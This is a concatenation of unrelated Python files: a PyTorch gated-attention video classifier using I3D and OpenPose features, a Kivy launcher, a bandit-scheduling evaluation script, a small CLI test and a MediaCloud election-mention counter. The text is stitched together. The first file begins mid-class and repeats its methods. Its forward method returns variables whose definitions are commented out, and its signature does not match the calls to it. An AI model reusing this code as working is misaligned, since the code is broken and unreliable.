Y_hat = torch.ge(Y_prob, 0.5).float()
return Y_prob, Y_hat, A
# AUXILIARY METHODS
def calculate_classification_error(self, X, Y):
Y = Y.float()
_, Y_hat, _ = self.forward(X)
        error = 1. - Y_hat.eq(Y).cpu().float().mean().item()
return error, Y_hat
def calculate_objective(self, X, Y):
Y = Y.float()
Y_prob, _, A = self.forward(X)
Y_prob = torch.clamp(Y_prob, min=1e-5, max=1. - 1e-5)
neg_log_likelihood = -1. * (Y * torch.log(Y_prob) + (1. - Y) * torch.log(1. - Y_prob)) # negative log bernoulli
return neg_log_likelihood, A
class GatedAttention(nn.Module):
def __init__(self, embeddingDimension=120):
super(GatedAttention, self).__init__()
# self.L = 500
self.L = 256
self.D = 64
self.embeddingDimension = embeddingDimension #this could be a possible hyperparameter
self.K = 1
self.poolingPolicy = ["attention", "avg", "max"]
""" i3d layers """
self.i3d_opticalflow_extractor1 = nn.Sequential(
#when pooling layer is used
nn.MaxPool2d(kernel_size=3, stride=1),
nn.Conv2d(in_channels=1024, out_channels=512, kernel_size=3,stride=1),
nn.ReLU(),
nn.Conv2d(in_channels=512, out_channels=256, kernel_size=1, stride=1),
nn.ReLU()
)
self.i3d_opticalflow_extractor2 = nn.Sequential(
nn.Conv2d(in_channels=1024, out_channels=512, kernel_size=3, stride=1),
nn.ReLU(),
nn.Conv2d(in_channels=512, out_channels=256, kernel_size=3, stride=1),
nn.ReLU()
)
self.i3d_opticalflow_extractor3 = nn.Sequential(
nn.Conv2d(in_channels=256, out_channels=64, kernel_size=1),
nn.ReLU()
)
self.i3d_opticalflow_extractor4 = nn.Sequential(
nn.Linear(in_features=64*3*3, out_features=self.embeddingDimension),
nn.ReLU()
)
self.i3d_rgb_extractor1 = nn.Sequential(
#When pooling layer is used
nn.MaxPool2d(kernel_size=3, stride=1),
nn.Conv2d(in_channels=1024, out_channels=512, kernel_size=3,stride=1),
nn.ReLU(),
nn.Conv2d(in_channels=512, out_channels=256, kernel_size=1, stride=1),
nn.ReLU()
)
self.i3d_rgb_extractor2 = nn.Sequential(
nn.Conv2d(in_channels=1024, out_channels=512, kernel_size=3, stride=1),
nn.ReLU(),
nn.Conv2d(in_channels=512, out_channels=256, kernel_size=3, stride=1),
nn.ReLU()
)
self.i3d_rgb_extractor3 = nn.Sequential(
nn.Conv2d(in_channels=256, out_channels=64, kernel_size=1),
nn.ReLU()
)
self.i3d_rgb_extractor4 = nn.Sequential(
nn.Linear(in_features=64*3*3, out_features=self.embeddingDimension),
nn.ReLU()
)
""" openpose frame layers """
self.frame_dense1 = nn.Linear(in_features=25*3, out_features=self.embeddingDimension)
self.attention_V_frame = nn.Sequential(
nn.Linear(self.embeddingDimension, self.D),
# nn.Linear(90, 60),
nn.Tanh()
)
self.attention_U_frame = nn.Sequential(
nn.Linear(self.embeddingDimension, self.D),
# nn.Linear(90, 60),
nn.Sigmoid()
)
self.attention_weights_frame = nn.Linear(self.D, self.K)
""" openpose instance layers"""
self.instance_dense1 = nn.Linear(in_features=120, out_features=256)
self.lstm_input_dim = 256
self.lstm_output_dim = 512
self.lstm_layers_num = 1
#should we opt for bidirectional lstm layer?
self.instance_lstm_layer = nn.LSTM(
input_size=self.lstm_input_dim,
hidden_size=self.lstm_output_dim,
num_layers=self.lstm_layers_num,
batch_first=True,
# bidirectional=True
)
self.instance_dense2 = nn.Linear(in_features=512, out_features=120)
self.attention_V_instance = nn.Sequential(
nn.Linear(512, 256),
# nn.Linear(90, 60),
nn.Tanh()
)
self.attention_U_instance = nn.Sequential(
nn.Linear(512, 256),
# nn.Linear(90, 60),
nn.Sigmoid()
)
self.attention_weights_instance = nn.Linear(256, self.K)
"openpose bag layers"
"""classfier layers"""
self.classifier = nn.Sequential(
nn.Linear(self.L*self.K, 1),
nn.Sigmoid()
)
#this is a trial attempt at building a feature extractor for the optical flow from i3d
# (m,7,7,1024) maybe?
#I'm assuming, the input will be of the form (m, 7, 7, 1024)
#output will be a 120 dimension vector for now
def feature_extractor_opticalflow_i3d(self, opticalFlow, ifPool=False):
#reshaping the opticalFlow, so that it is in channel-first order (m,1024,7,7)
# opticalFlow = opticalFlow.permute(0,3,1,2)
#reshaping the opticalFlow, so that it is in channel-first order (1024,7,7)
        opticalFlow = opticalFlow.permute(2, 0, 1)  # change here: channel-first (1024, 7, 7)
opticalFlow = opticalFlow.unsqueeze(0) #including the batch size, the shape becomes (1,1024,7,7)
if ifPool==True:
opticalFlow = self.i3d_opticalflow_extractor1(opticalFlow)
else:
opticalFlow = self.i3d_opticalflow_extractor2(opticalFlow)
opticalFlow = self.i3d_opticalflow_extractor3(opticalFlow)
opticalFlow = opticalFlow.reshape(-1, 64*3*3)
opticalFlow = self.i3d_opticalflow_extractor4(opticalFlow) #output shape (m, 120)
return opticalFlow.squeeze(0) #output shape (120)
# return opticalFlow #output shape (m,120)
#this is a trial attempt at building a feature extractor for the rgb output from i3d
# input dimension will be (7,7,1024) or (m,7,7,1024) maybe?
#I'm assuming, the input will be of the form (7, 7, 1024)
#output will be a 120 dimension vector for now
def feature_extractor_rgb_i3d(self, rgb, ifPool=False):
#reshaping the rgb input, so that it is in channel-first order (m,1024,7,7)
# rgb = rgb.permute(0,3,1,2)
#reshaping the rgb input, so that it is in channel-first order (1024,7,7)
rgb = rgb.permute(2,0,1)
rgb = rgb.unsqueeze(0) #including the batch-size dimension, the shape becomes (1,1024,7,7)
if ifPool==True:
rgb = self.i3d_rgb_extractor1(rgb)
else:
rgb = self.i3d_rgb_extractor2(rgb)
rgb = self.i3d_rgb_extractor3(rgb)
rgb = rgb.reshape(-1, 64*3*3)
rgb = self.i3d_rgb_extractor4(rgb) #output shape (m, 120)
return rgb.squeeze(0) #output shape (120)
# return rgb #output shape (m,120)
#I'm assuming that a tensor of following shape will be passed to this method: (m, human_count,25, 3)
#here m == number of frames in an instance
#m will work as the batch size for the following calculations
def frame_encoder(self, openpose_instance_frames, pooling='attention'):
#openpose_instance_frames will be of shape (human_count, 25, 3)
human_count = openpose_instance_frames.shape[0]
#openpose_instance_frames will be of the size (m, human_count, 25, 3), here m is the batch_size
# m = openpose_instance_frames.shape[0]
# human_count = openpose_instance_frames.shape[1]
H = openpose_instance_frames.reshape(human_count, 25*3)
# H = openpose_instance_frames.reshape(-1, human_count, 25*3)
H = self.frame_dense1(H) #output of this will be shape (human_count, 120)
A = None
if pooling == 'attention' or pooling == 'max':
A_V = self.attention_V_frame(H) #(human_count, 64)
A_U = self.attention_U_frame(H) #(human_count, 64)
A = self.attention_weights_frame(A_V*A_U) # (human_count, 1)
A = torch.transpose(A, 1, 0) #(1, human_count)
# A = A.permute(0, 2, 1) #(m, 1, human_count)
if pooling == 'attention':
A = F.softmax(A, dim=1) # softmax over human_count, (1, human_count)
# A = F.softmax(A, dim=2) #softmax over human_count (m, 1, human_count), softmax doesn't have learnable parameters, hence it need not be declared in __init__
else:
# A_ = torch.zeros((m, 1, human_count))
A_ = torch.zeros(( 1,human_count))
A_[0][A.argmax()] = 1
# for i in range(m):
# A_[i][0][A[i][0].argmax()] = 1
A = A_
elif pooling == 'avg':
# A = torch.ones((m,1,human_count))/human_count
A = torch.ones((1,human_count))/human_count
# M = torch.zeros((m,1,120))
M = torch.mm(A, H) #(1,120)
# for i in range(m):
# M[i] = torch.mm(A[i], H[i]) #Shape of M (m,1,120)
return M.squeeze(0) #output shape (120)
# return M.squeeze(1) #output shape (m,120)
#I'm assuming batch size will be 1 and batch_size will not be included in the input dimension
#I'm assuming that the single_instance will be "list" of tensors of shape (human_count, 25, 3)
def openpose_instance_encoder(self, single_instance, pooling="attention"):
instanceLen = len(single_instance)
encoded_frames = torch.zeros((instanceLen, self.lstm_input_dim)) #(frame_count, 256)
for i in range(instanceLen):
encoded_frame = self.frame_encoder(single_instance[i]) #output shape (120)
encoded_frame = self.instance_dense1(encoded_frame) #output shape (256)
# encoded_frame = encoded_frame.unsqueeze(0) #output shape (1,256)
# encoded_frame = encoded_frame.unsqueeze(1) #output shape (m,1,256)
encoded_frames[i] = encoded_frame
encoded_frames = encoded_frames.unsqueeze(0)
#now encoded_frames will be a tensor of shape (1, frame_count, 256), because lstm expects 3d inputs
#not passing initial activation and initial cell is the same as passing a couple of 0 vectors
activations, last_activation_cell = self.instance_lstm_layer(encoded_frames) #output shape (1, frame_count, 512)
outPutEmbedding = None
if pooling == "attention":
H = activations[0] #shape(frame_count, 512)
A_V = self.attention_V_instance(H) #shape (frame_count, 256)
A_U = self.attention_U_instance(H) #shape (frame_count, 256)
A = self.attention_weights_instance(A_V*A_U) #shape (frame_count, 1)
A = torch.transpose(A, 1, 0) #shape (1, frame_count)
A = F.softmax(A, dim=1) # softmax over frame_count, (1, frame_count)
outPutEmbedding = torch.mm(A,H) #shape (1,512)
outPutEmbedding = outPutEmbedding.squeeze(0) #shape(512)
else:
#since I'm not using the attention pooling, I'll just select last activation as the outputEmbedding
outPutEmbedding = activations[0][-1] #shape (512)
outPutEmbedding = self.instance_dense2(outPutEmbedding) #shape (120)
return outPutEmbedding #shape (120)
#return outPutEmbedding[0][0] #output shape (120)
# return outPutEmbedding[0] #output shape (m,120)
#Each bag is a datapoint. Each bag has multiple instance in it. Each instance has multiple
#frames in it.
#openpose bag is list of list of tensors
def openpose_bag_encoder(self, bag, pooling="attention"):
instanceNum = len(bag)
instanceEncoding = torch.zeros((instanceNum, self.embeddingDimension)) #(instanceNum, 120)
for idx in range(instanceNum):
singleInstance = self.openpose_instance_encoder(bag[idx])
instanceEncoding[idx] = singleInstance
#instanceEncoding has shape (instanceNum, 120)
instanceEncoding = instanceEncoding.unsqueeze(0) #(1, instanceNum, 120)
#not passing initial activation and initial cell is the same as passing a couple of 0 vectors
# activations, last_activation_cell = self.instance_lstm_layer(instanceEncoding) #output shape (1, frame_count, 512)
# outPutEmbedding = None
# if pooling == "attention":
# H = activations[0] #shape(frame_count, 512)
# A_V = self.attention_V_instance(H) #shape (frame_count, 256)
# A_U = self.attention_U_instance(H) #shape (frame_count, 256)
# A = self.attention_weights_instance(A_V*A_U) #shape (frame_count, 1)
# A = torch.transpose(A, 1, 0) #shape (1, frame_count)
# A = F.softmax(A, dim=1) # softmax over frame_count, (1, frame_count)
# outPutEmbedding = torch.mm(A,H) #shape (1,512)
# outPutEmbedding = outPutEmbedding.squeeze(0) #shape(512)
# else:
# #since I'm not using the attention pooling, I'll just select last activation as the outputEmbedding
# outPutEmbedding = activations[0][-1] #shape (512)
# outPutEmbedding = self.instance_dense2(outPutEmbedding) #shape (120)
# return outPutEmbedding #shape (120)
#I'm assuming x will be like the following [i3d_optical, i3d_rgb, openpose_list]
#openpose_list == list of instances
#an instance == list of frames
#a frame == a tensor of shape (human_count, 25, 3)
def forward(self, x, y):
# x = x.squeeze(0)
i3d_optical = x[0]
i3d_rgb = x[1]
openpose_bag = x[2]
optical_encoding = self.feature_extractor_opticalflow_i3d(i3d_optical) #shape (120)
rgb_encoding = self.feature_extractor_rgb_i3d(i3d_rgb) #shape (120)
i3d_encoding = optical_encoding + rgb_encoding #shape (120)
openpose_encoding = self.openpose_bag_encoder(openpose_bag) #shape (120)
# H = self.feature_extractor_part1(x)
# H = H.view(-1, 50 * 4 * 4)
# H = self.feature_extractor_part2(H) # NxL
# A_V = self.attention_V(H) # NxD
# A_U = self.attention_U(H) # NxD
# A = self.attention_weights(A_V * A_U) # element wise multiplication # NxK
# A = torch.transpose(A, 1, 0) # KxN
# A = F.softmax(A, dim=1) # softmax over N
# M = torch.mm(A, H) # KxL
# Y_prob = self.classifier(M)
# Y_hat = torch.ge(Y_prob, 0.5).float()
return Y_prob, Y_hat, A
# AUXILIARY METHODS
def calculate_classification_error(self, X, Y):
Y = Y.float()
_, Y_hat, _ = self.forward(X)
error = 1. - Y_hat.eq(Y).cpu().float().mean().item()
return error, Y_hat
def calculate_objective(self, X, Y):
Y = Y.float()
Y_prob, _, A = self.forward(X)
Y_prob = torch.clamp(Y_prob, min=1e-5, max=1. - 1e-5)
neg_log_likelihood = -1. * (Y * torch.log(Y_prob) + (1. - Y) * torch.log(1. - Y_prob)) # negative log bernoulli
return neg_log_likelihood, A
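if __name__ == '__main__':
    # Shape-check sketch (not part of the original file): run random OpenPose-style
    # inputs through the frame and instance encoders to confirm the expected
    # embedding sizes. Per the comments above, a frame is (human_count, 25, 3)
    # and an instance is a list of such frames; the sizes used here are arbitrary.
    model = GatedAttention()
    with torch.no_grad():
        frame = torch.rand(5, 25, 3)                            # 5 detected humans in one frame
        frame_embedding = model.frame_encoder(frame)
        print(frame_embedding.shape)                            # torch.Size([120])

        instance = [torch.rand(3, 25, 3) for _ in range(8)]     # 8 frames in one instance
        instance_embedding = model.openpose_instance_encoder(instance)
        print(instance_embedding.shape)                         # torch.Size([120])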
|
from src.util import resource_path, data_path
from kivy.config import Config
Config.set('kivy', 'log_dir', data_path(''))
import kivy.resources
kivy.resources.resource_add_path(resource_path('src/ui'))
from src.ui.kivy.KivyPlyerGui import RSS2VidApp
RSS2VidApp().run()
|
"""
testing a trained model for scheduling,
and comparing its performance with the
size-aware whittle index heuristic.
To test a control policy, uncomment the code corresponding to an algorithm.
"""
import os
import torch
import random
import operator
import itertools
import numpy as np
import pandas as pd
import scipy.special
import sys
sys.path.insert(0,'../')
from neurwin import fcnn
from qlearning import qLearningAgent
import matplotlib.pyplot as plt
from aql import ProposalQNetwork
from envs.sizeAwareIndexEnv import sizeAwareIndexEnv
from reinforce import reinforceFcnn, REINFORCE
###########################-CONSTANT VALUES-########################################
STATESIZE = 2
numEpisodes = 1
SEED = 30
filesSeed = 50
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
################################-PARAMETERS-########################################
CASE = 1
SCHEDULE = 1
REINFORCELR = 0.001
BATCHSIZE = 5
ARMS = 4
BETA = 0.99
TIMELIMIT = 300
numClass1 = 2
numClass2 = 2
EPISODESEND = 1
EPISODERANGE = 1000
RUNS = 50
noiseVar = 0
NOISY = False
noiseVal = 0.0
assert(numClass1+numClass2 == ARMS)
if CASE == 1:
HOLDINGCOST1 = 1
HOLDINGCOST2 = 1
MAXLOAD1 = 1000000
MAXLOAD2 = 1000000
TESTLOAD1 = np.random.randint(1, MAXLOAD1, size=ARMS)
TESTLOAD2 = np.random.randint(1, MAXLOAD2, size=ARMS)
GOODTRANS1 = 33600
BADTRANS1 = 8400
GOODTRANS2 = 33600
BADTRANS2 = 8400
GOODPROB1 = 0.75
GOODPROB2 = 0.1
if CASE == 2:
HOLDINGCOST1 = 5
HOLDINGCOST2 = 1
MAXLOAD1 = 1000000
MAXLOAD2 = 1000000
TESTLOAD1 = np.random.randint(1, MAXLOAD1, size=ARMS)
TESTLOAD2 = np.random.randint(1, MAXLOAD2, size=ARMS)
GOODTRANS1 = 33600
BADTRANS1 = 8400
GOODTRANS2 = 33600
BADTRANS2 = 8400
GOODPROB1 = 0.5
GOODPROB2 = 0.5
if NOISY:
directory = (f'../testResults/size_aware_env/noisy_results/noise_val_{noiseVal}/case_{CASE}/')
WINNMODEL1DIR = (f'../trainResults/neurwin/size_aware_env/noise_{noiseVal}_version/case_{CASE}/class_1/')
WINNMODEL2DIR = (f'../trainResults/neurwin/size_aware_env/noise_{noiseVal}_version/case_{CASE}/class_2/')
if not os.path.exists(directory):
os.makedirs(directory)
else:
directory = (f'../testResults/size_aware_env/case_{CASE}/')
WINNMODEL1DIR = (f'../trainResults/neurwin/size_aware_env/case_{CASE}/class_1/')
WINNMODEL2DIR = (f'../trainResults/neurwin/size_aware_env/case_{CASE}/class_2/')
if not os.path.exists(directory):
os.makedirs(directory)
readMeFileName = (f'{directory}'+'readme.txt')
readMeFile = open(readMeFileName, 'a')
readMeFile.write(f'\nSelected case: {CASE}\nNumber of arms: {ARMS} \nNumber of class 1 arms: {numClass1} \nNumber of class 2 arms: {numClass2}')
readMeFile.close()
REINFORCEDIR = (f'../trainResults/reinforce/size_aware_env/case_{CASE}/arms_{ARMS}_schedule_{SCHEDULE}/')
WOLPDIR = (f'../trainResults/wolp_ddpg/size_aware_env/arms_{ARMS}_schedule_{SCHEDULE}/')
AQLDIR = (f'../trainResults/aql/size_aware_env/case_{CASE}/arms_{ARMS}_schedule_{SCHEDULE}/')
##########################-- TESTING FUNCTIONS --#########################################
def calculateSecondaryIndex():
global goodEnvs, goodIndex
for i in goodEnvs:
        numer = envs[i].holdingCost * envs[i].goodTransVal
        denom = envs[i].arm[0][0]
        goodIndex[i] = numer / denom
def getSelectionSizeAware(goodIndex, badIndex):
result = []
copyGoodIndex = goodIndex.copy()
copyBadIndex = badIndex.copy()
    # activate at most SCHEDULE arms, or every remaining arm if fewer are available
    armsToActivate = min(SCHEDULE, len(copyGoodIndex) + len(copyBadIndex))
for i in range(armsToActivate):
if len(copyGoodIndex) != 0:
result.append(max(copyGoodIndex.items(), key=operator.itemgetter(1))[0])
del copyGoodIndex[result[-1]]
else:
result.append(max(copyBadIndex.items(), key=operator.itemgetter(1))[0])
del copyBadIndex[result[-1]]
return result
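# Illustrative walk-through (hypothetical index values): with SCHEDULE = 2,
# goodIndex = {0: 3.2, 1: 1.5} and badIndex = {2: 0.4}, the loop first drains the
# good-channel arms in decreasing index order and only then falls back to the
# bad-channel arms, so getSelectionSizeAware returns [0, 1].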
def getSelection(index):
result = []
copyIndex = index.copy()
if len(copyIndex) < SCHEDULE:
for i in range(len(copyIndex)):
result.append(max(copyIndex.items(), key=operator.itemgetter(1))[0])
del copyIndex[result[i]]
else:
for i in range(SCHEDULE):
result.append(max(copyIndex.items(), key=operator.itemgetter(1))[0])
del copyIndex[result[i]]
choice = result
return choice
def calculatePrimaryIndex():
global badEnvs, badIndex
for i in badEnvs:
numer = envs[i].holdingCost
denom = envs[i].goodProb*((envs[i].goodTransVal/envs[i].badTransVal) - 1)
badIndex[i] = numer / denom
def initialize():
global numClass1, numClass2, TESTLOAD1, TESTLOAD2, envSeeds, envs
num1 = numClass1
num2 = numClass2
load1Index = 0
load2Index = 0
for i in range(ARMS):
if num1 != 0:
env = sizeAwareIndexEnv(numEpisodes=numEpisodes, HOLDINGCOST=HOLDINGCOST1, seed=envSeeds[i], Training=False,
r1=BADTRANS1, r2=GOODTRANS1, q=GOODPROB1, case=CASE, classVal=1, load=TESTLOAD1[load1Index], noiseVar = noiseVar,
maxLoad = MAXLOAD1, batchSize=EPISODESEND, episodeLimit=1000000, fixedSizeMDP=False)
load1Index += 1
num1 -= 1
elif num2 != 0:
env = sizeAwareIndexEnv(numEpisodes=numEpisodes, HOLDINGCOST=HOLDINGCOST2, seed=envSeeds[i], Training=False,
r1=BADTRANS2, r2=GOODTRANS2, q=GOODPROB2, case=CASE, classVal=2, load=TESTLOAD2[load2Index], noiseVar = noiseVar,
maxLoad = MAXLOAD2, batchSize=EPISODESEND, episodeLimit=1000000, fixedSizeMDP=False)
load2Index += 1
num2 -= 1
envs[i] = env
def initializeAgents():
global MODELNAME1, MODELNAME2, agents
num1 = numClass1
num2 = numClass2
for i in range(ARMS):
if num1 != 0:
agent = fcnn(stateSize=STATESIZE)
agent.load_state_dict(torch.load(MODELNAME1))
agent.eval()
agents[i] = agent
num1 -= 1
elif num2 != 0:
agent = fcnn(stateSize=STATESIZE)
agent.load_state_dict(torch.load(MODELNAME2))
agent.eval()
agents[i] = agent
num2 -= 1
def resetEnvs():
global states, envs
for key in envs:
state = envs[key].reset()
states[key] = state
def calculateIndexNeuralNetwork():
global indexNN, states
for key in agents:
indexNN[key] = agents[key].forward(states[key]).detach().numpy()[0]
choice = getSelection(indexNN)
indexNN = {}
return choice
def selectArmSizeAwareIndex():
global goodEnvs, badEnvs, goodIndex, badIndex, time, states
for key in envs:
if envs[key].channelState[time] == 1:
goodEnvs.append(key)
else:
badEnvs.append(key)
calculateSecondaryIndex()
calculatePrimaryIndex()
arms = getSelectionSizeAware(goodIndex, badIndex)
goodEnvs = []
badEnvs = []
goodIndex = {}
badIndex = {}
return arms
def takeActionAndRecordNN(arms):
global rewards, time, states, envs
cumReward = 0
for arm in arms:
nextState, reward, done, info = envs[arm].step(1)
cumReward += reward
states[arm] = nextState
if done:
del envs[arm]
del agents[arm]
for key in envs:
if key in arms:
pass
else:
nextState, reward, done, info = envs[key].step(0)
states[key] = nextState
cumReward += reward
rewards.append((BETA**time)*cumReward)
def takeActionAndRecordRewardSizeAwareIndex(arms):
global rewards, time, envs, states
cumReward = 0
for arm in arms:
nextState, reward, done, info = envs[arm].step(1)
cumReward += reward
states[arm] = nextState
if done:
del envs[arm]
for key in envs:
if key in arms:
pass
else:
nextState, reward, done, info = envs[key].step(0)
states[key] = nextState
cumReward += reward
rewards.append((BETA**time)*cumReward)
def getActionTableLength():
scheduleArms = SCHEDULE
n = int(ARMS)
# Enumerate all binary action vectors and keep those activating exactly SCHEDULE arms;
# the resulting table has scipy.special.binom(ARMS, scheduleArms) entries.
actionTable = list(itertools.product([0, 1], repeat=n))
actionTable = [x for x in actionTable if sum(x) == scheduleArms]
return actionTable
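# Example (illustrative): with ARMS = 4 and SCHEDULE = 1, getActionTableLength() keeps the
# four one-hot activation vectors (0, 0, 0, 1), (0, 0, 1, 0), (0, 1, 0, 0), (1, 0, 0, 0),
# i.e. scipy.special.binom(4, 1) = 4 admissible patterns.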
def REINFORCETakeActionAndRecordReward():
global rewards, state, reinforceAgent, envs, actionTable
cumReward = 0
stateVals = []
action_probs = reinforceAgent.forward(state).detach().numpy()
G = np.random.RandomState()
action = G.choice(np.arange(len(actionTable)), p=action_probs)
actionVector = actionTable[action]
for i in range(len(actionVector)):
if actionVector[i] == 1:
nextState, reward, done, info = envs[i].step(1)
stateVals.append(nextState[0])
stateVals.append(nextState[1])
if nextState[0] != 0.:
cumReward += reward
else:
nextState, reward, done, info = envs[i].step(0)
stateVals.append(nextState[0])
stateVals.append(nextState[1])
if nextState[0] != 0.:
cumReward += reward
state = stateVals
state = np.array(state, dtype=np.float32)
rewards.append((BETA**time)*cumReward)
def resetREINFORCEEnvs():
global envs, state
for key in envs:
vals = envs[key].reset()
val1 = vals[0]
val2 = vals[1]
state.append(val1)
state.append(val2)
state = np.array(state, dtype=np.float32)
##########################TESTING-STEP######################################
####################### SIZE-AWARE INDEX ##################################
'''
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
cumReward = []
for i in range(RUNS):
envSeeds = np.random.randint(0, 10000, size=ARMS)
time = 0
envs = {}
rewards = []
goodEnvs = []
badEnvs = []
#index = {}
goodIndex = {}
badIndex = {}
agents = {}
states = {}
indexNN = {}
LOADS = []
initialize()
resetEnvs()
while (time < TIMELIMIT):
arms = selectArmSizeAwareIndex()
takeActionAndRecordRewardSizeAwareIndex(arms)
###############################################
time += 1
if len(envs) == 0:
break
total_reward = (np.cumsum(rewards))[-1]
cumReward.append(total_reward)
print(f'Finished size aware index value for run {i+1} scheduling {SCHEDULE} arms')
data = {'run': range(RUNS), 'cumulative_reward':cumReward}
df = pd.DataFrame(data=data)
sizeAwareFileName = (f'{directory}'+f'sizeAwareIndexResults_arms_{ARMS}_schedule_{SCHEDULE}_arms.csv')
df.to_csv(sizeAwareFileName, index=False)
'''
################################### NEURWIN TESTING ##########################################
'''
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
for i in range(RUNS):
envSeeds = np.random.randint(0, 10000, size=ARMS)
ALLEPISODES = np.arange(0, EPISODESEND+EPISODERANGE, EPISODERANGE)
zeroEnvs = {}
total_reward = []
for x in ALLEPISODES:
EPISODESTRAINED = x
MODELNAME1 = WINNMODEL1DIR+(f'seed_{filesSeed}_lr_0.001_batchSize_{BATCHSIZE}_trainedNumEpisodes_{EPISODESTRAINED}/trained_model.pt')
MODELNAME2 = WINNMODEL2DIR+(f'seed_{filesSeed}_lr_0.001_batchSize_{BATCHSIZE}_trainedNumEpisodes_{EPISODESTRAINED}/trained_model.pt')
nnFileName = directory+(f'nnIndexResults_arms_{ARMS}_batchSize_{BATCHSIZE}_run_{i}_schedule_{SCHEDULE}_arms.csv')
############################## NN INDEX TEST ####################################
time = 0
envs = {}
rewards = []
goodEnvs = []
badEnvs = []
index = {}
agents = {}
states = {}
indexNN = {}
initialize()
initializeAgents()
resetEnvs()
while (time < TIMELIMIT):
arms = calculateIndexNeuralNetwork()
takeActionAndRecordNN(arms)
###############################################
time += 1
if len(envs) == 0:
break
total_reward.append((np.cumsum(rewards))[-1])
print(f'finished NN scheduling for episode {x}')
data = {'episode': np.arange(0, EPISODESEND+EPISODERANGE, EPISODERANGE), 'cumulative_reward':total_reward}
df = pd.DataFrame(data=data)
df.to_csv(nnFileName, index=False)
print(f'finished NN scheduling for run {i+1}')
'''
############################### REINFORCE TESTING ########################################
'''
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
actionTable = getActionTableLength()
hidden1 = 92
hidden2 = 42
for i in range(RUNS):
envSeeds = np.random.randint(0, 10000, size=ARMS)
ALLEPISODES = np.arange(0, EPISODESEND+EPISODERANGE, EPISODERANGE)
zeroEnvs = {}
total_reward = []
remainingLoad = 0
for x in ALLEPISODES:
EPISODESTRAINED = x
REINFORCEMODELDIR = REINFORCEDIR+(f'seed_{filesSeed}_lr_{REINFORCELR}_batchSize_{BATCHSIZE}_trainedNumEpisodes_{EPISODESTRAINED}/trained_model.pt')
reinforceFileName = directory+(f'reinforceResults_arms_{ARMS}_batchSize_{BATCHSIZE}_lr_{REINFORCELR}_run_{i}_schedule_{SCHEDULE}.csv')
time = 0
envs = {}
rewards = []
state = []
initialize()
resetREINFORCEEnvs()
reinforceAgent = reinforceFcnn(stateDim=ARMS*2, actionDim=ARMS, hidden1=hidden1, hidden2=hidden2)
reinforceAgent.load_state_dict(torch.load(REINFORCEMODELDIR))
reinforceAgent.eval()
while (time < TIMELIMIT):
REINFORCETakeActionAndRecordReward()
time += 1
for b in envs:
remainingLoad += envs[b].arm[0][0]
if remainingLoad == 0:
break
remainingLoad = 0
total_reward.append((np.cumsum(rewards))[-1])
print(f'finished REINFORCE scheduling for episode {x}. rewards: {total_reward[-1]}')
data = {'episode': np.arange(0, EPISODESEND+EPISODERANGE, EPISODERANGE), 'cumulative_reward':total_reward}
df = pd.DataFrame(data=data)
df.to_csv(reinforceFileName, index=False)
print(f'finished REINFORCE scheduling for run {i+1}')
'''
########################## AQL TESTING ###############################
def AQLTakeActionAndRecordReward():
global rewards, state, aqlAgent, envs, actionTable
cumReward = 0
stateVals = []
action, qVals = aqlAgent.forward(state)
if len(envs) == 100:
indices = (-qVals).argsort()[:SCHEDULE]
notIndices = (-qVals).argsort()[SCHEDULE:]
qVals[indices] = 1
qVals[notIndices] = 0
actionVector = qVals.detach().numpy()
else:
actionVector = actionTable[action]
for i in range(len(actionVector)):
if actionVector[i] == 1:
nextState, reward, done, info = envs[i].step(1)
stateVals.append(nextState[0])
stateVals.append(nextState[1])
if nextState[0] != 0.:
cumReward += reward
else:
nextState, reward, done, info = envs[i].step(0)
stateVals.append(nextState[0])
stateVals.append(nextState[1])
if nextState[0] != 0.:
cumReward += reward
state = stateVals
state = np.array(state, dtype=np.float32)
rewards.append((BETA**time)*cumReward)
'''
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
#actionTable = getActionTableLength()
DIM1 = 512
DIM2 = 196
for i in range(RUNS):
envSeeds = np.random.randint(0, 10000, size=ARMS)
ALLEPISODES = np.arange(0, EPISODESEND+EPISODERANGE, EPISODERANGE)
total_reward = []
for x in ALLEPISODES:
EPISODESTRAINED = x
AQLMODELDIR = AQLDIR+(f'seed_{filesSeed}_lr_0.001_trainedNumEpisodes_{EPISODESTRAINED}/trained_model.pt')
aqlFileName = directory+(f'aqlResults_arms_{ARMS}_run_{i}_schedule_{SCHEDULE}.csv')
time = 0
envs = {}
rewards = []
state = []
initialize()
resetREINFORCEEnvs()
aqlAgent = ProposalQNetwork(ARMS*2, ARMS, DIM1, DIM2)
aqlAgent.load_state_dict(torch.load(AQLMODELDIR))
aqlAgent.eval()
while True:
AQLTakeActionAndRecordReward()
time += 1
if time == TIMELIMIT:
break
total_reward.append((np.cumsum(rewards))[-1])
print(f'finished AQL for trained episodes: {x}. rewards : {total_reward[-1]}')
data = {'episode': np.arange(0, EPISODESEND+EPISODERANGE, EPISODERANGE), 'cumulative_reward':total_reward}
df = pd.DataFrame(data=data)
df.to_csv(aqlFileName, index=False)
print(f'finished AQL scheduling for run {i+1}')
'''
|
import os
from common.utils import run, expect_retcode
def run_test(sut, verbose, debug):
this_dir = os.path.dirname(os.path.abspath(__file__))
args = '-h'.split()
proc, out = run(sut, args, this_dir, 3, verbose, debug)
expect_retcode(proc, 0, out, verbose, debug)
|
import mediacloud, datetime, logging
logging.basicConfig(filename='electionCount.log', format='%(levelname)s:%(message)s', level=logging.DEBUG)
class ElectionCount:
def __init__(self, key):
# Initialise with the provided MediaCloud API key
self.key = key
logging.info('Accessing MediaCloud')
self.mc = mediacloud.api.MediaCloud(self.key)
logging.info('Finished Accessing MediaCloud')
def getSentenceCount(self, person1, person2, start_date, end_date):
logging.debug('Inputs to getSentenceCount: ' + person1 + ',' + person2 + ',' + str(start_date) + ',' + str(end_date))
mc = self.mc
res = mc.sentenceCount(person1, solr_filter=[self.mc.publish_date_query( datetime.date(start_date[2], start_date[1], start_date[0]), datetime.date(end_date[2], end_date[1], end_date[0]) ), 'tags_id_media:1' ])
res2 = mc.sentenceCount(person2, solr_filter=[mc.publish_date_query( datetime.date(start_date[2], start_date[1], start_date[0]), datetime.date(end_date[2], end_date[1], end_date[0]) ), 'tags_id_media:1' ])
return res['count'], res2['count']
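# Minimal usage sketch (hypothetical API key, queries and dates):
# counter = ElectionCount('MY_MEDIACLOUD_API_KEY')
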